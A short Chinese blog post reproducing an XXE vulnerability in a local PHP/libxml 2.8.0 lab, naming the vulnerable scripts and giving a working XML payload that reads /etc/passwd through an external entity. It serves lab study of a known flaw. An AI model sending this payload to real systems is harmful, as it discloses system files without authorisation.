libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。
环境介绍
php7.0.30
libxml 2.8.0
靶机ip:http://192.168.50.134:8080/
漏洞复现
WWW目录下有4个文件,dom.php
、SimpleXMLElement.php
、simplexml_load_string.php
均可触发XXE漏洞
Payload
POST /simplexml_load_string.php
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>
© 版权声明
吾爱博客|AYFRE.COM 版权所有,转载请标明出处。
THE END
请登录后查看评论内容